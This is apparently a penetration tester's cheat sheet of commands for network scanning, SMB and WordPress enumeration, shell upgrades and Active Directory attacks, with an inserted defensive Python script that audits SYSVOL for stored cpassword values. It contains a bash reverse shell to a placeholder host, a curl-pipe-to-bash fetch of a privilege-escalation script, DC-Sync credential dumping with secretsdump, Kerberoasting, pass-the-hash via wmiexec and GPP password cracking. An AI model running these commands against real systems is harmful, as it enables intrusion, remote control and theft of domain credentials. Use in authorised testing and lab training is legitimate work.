Some books you want to read:
- The OSINT Handbook: A practical guide to gathering and analyzing online information
- Advanced Penetration Testing with Kali Linux: Unlocking industry-oriented VAPT tactics
- Fighting Phishing: Everything You Can Do to Fight Social Engineering and Phishing
Useful tips and tools for hacking
- create a file with a range of ip addresses: seq -f "10.10.10.%g" 1 254 > ip.txt
- or use prips 10.0.0.0/23 > ip.txt (first install prips: apt install prips)
- echo $HISTFILE to check the history file location
Port scan commands
- nmap -T4 -sV -sT --reason -p1-65535 -vv -oN 'filename' 'IP' (full TCP port range, service versions, output to file)
- nmap -sC -sV -oA filename ip - ippsec parameters
- nmap --script vuln 'IP'
- nmap -sV -sC -A -oN filename ip
- unicornscan -r300 -mU 'IP' - UDP scan. USE -mT for TCP
ippsec tricks
- python -m SimpleHTTPServer PORT (Python 2; on Python 3 use python3 -m http.server PORT)
- curl IP:PORT/LinEnum.sh | bash
SMB scan
- smbclient -N //ip/sharename
Priv Esc
Shell
- python -c 'import pty; pty.spawn("/bin/sh")'
- python -c 'import pty; pty.spawn("/bin/bash")'
- bash -c 'bash -i >& /dev/tcp/YOURIP/PORT 0>&1'
- when you have a shell, press CTRL-Z to background it, then type stty raw -echo and then fg to get a proper TTY back
WPscan
- wpscan -u URL -eu -ep -et (old syntax; wpscan 3.x: wpscan --url URL -e u,p,t)
ippsec HackTheBox videos
- juicypotato windows priv esc - Conceal https://www.youtube.com/watch?v=1ae64CdwLHE
- setuid viewuser - Irked https://www.youtube.com/watch?v=OGFTM_qvtVI
- hackthebox squid server - https://www.youtube.com/watch?v=5wyvpJa9LdU
Bloodhound
- wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add -
- echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list
- sudo apt-get update
- sudo apt-get install neo4j
- sudo apt-get install bloodhound
- sudo neo4j start (then set the admin password in the browser)
- bloodhound
Screenshot
- gowitness-2.1.2-windows-amd64.exe scan --cidr 192.168.230.0/24 --threads 10
- gowitness-2.1.2-windows-amd64.exe scan -f ip_in_file.txt --threads 10
- gowitness-2.1.2-windows-amd64.exe report serve
Procdump
cpassword
- findstr /S /I cpassword $env:logonserver\sysvol\*.xml (PowerShell; $env:logonserver expands to \\DCNAME)
- crack passwords with https://github.com/t0thkr1s/gpp-decrypt
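A defender-side version of the cpassword check above, as an added example that is not part of this cheat sheet: it walks a SYSVOL-style tree, parses every XML file and reports each element that still carries a non-empty cpassword attribute (file, element, userName) without decrypting anything. The sample SYSVOL layout, GUID and cpassword value are constructed placeholders.

```python
"""Audit a SYSVOL-style tree for Group Policy Preference XML files that still
carry a cpassword attribute (what the findstr one-liner above searches for).
Added example, not part of the cheat sheet; reports locations, never decrypts."""
import os
import tempfile
import xml.etree.ElementTree as ET

def find_cpasswords(root_dir):
    """Return (path, element tag, userName, cpassword length) for every
    element with a non-empty cpassword attribute in any .xml under root_dir."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # skip files that are not well-formed XML
            for elem in tree.iter():
                cp = elem.get("cpassword")
                if cp:  # an empty cpassword="" means no password was set
                    findings.append((path, elem.tag, elem.get("userName", "?"), len(cp)))
    return findings

# Constructed sample data: one Groups.xml with a stored cpassword and one
# Drives.xml whose cpassword is empty (must not be reported).
SAMPLE_FILES = {
    "Groups/Groups.xml": """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000000}">
  <User clsid="{00000000-0000-0000-0000-000000000001}" name="helpdesk">
    <Properties action="U" userName="helpdesk" neverExpires="1"
      cpassword="PLACEHOLDER_NOT_A_REAL_ENCRYPTED_VALUE"/>
  </User>
</Groups>""",
    "Drives/Drives.xml": """<?xml version="1.0" encoding="utf-8"?>
<Drives><Drive name="H:"><Properties action="U" path="\\\\fs\\home"
  userName="" cpassword=""/></Drive></Drives>""",
}

def build_sample_sysvol():
    """Write the constructed files under a temp Policies/{GUID}/Machine/Preferences tree."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    prefs = os.path.join(root, "Policies", "{GPO-GUID}", "Machine", "Preferences")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(prefs, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Point find_cpasswords at a copy of the real SYSVOL share (or \\DCNAME\sysvol mounted locally) to list every GPP file that should have its stored credential removed.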
Extract a JSON value by key with grep (replace InsertSearchString with the key name)
- grep -oP '(?<="InsertSearchString": ")[^"]*'
Run PingCastle from CMD
- PingCastle.exe --server dc.local --user xxxx --password xxxx --healthcheck
- PingCastle.exe --server x.x.x.x --export users --user domainuser --password domainpassword
Find in Linux
- find -L . -name "foo*"
Kerberos attacks
- From a non-domain PC: python GetUserSPNs.py -dc-ip x.x.x.x bla.local/account:password -request
- or from a domain-joined PC: python GetUserSPNs.py bla.local/account:password -request
- DC-Sync attack: python secretsdump.py bla.local/account:password@dc1.bla.local
- if that works you can use python wmiexec.py bla.local/account@dc1.bla.local -hashes "insert hash"
Find installed MSIs
- Get-WmiObject Win32_Product | Format-Table IdentifyingNumber, Name
- then msiexec /fa ID to repair the package with that product code
Blacklist IPs when installing letsencrypt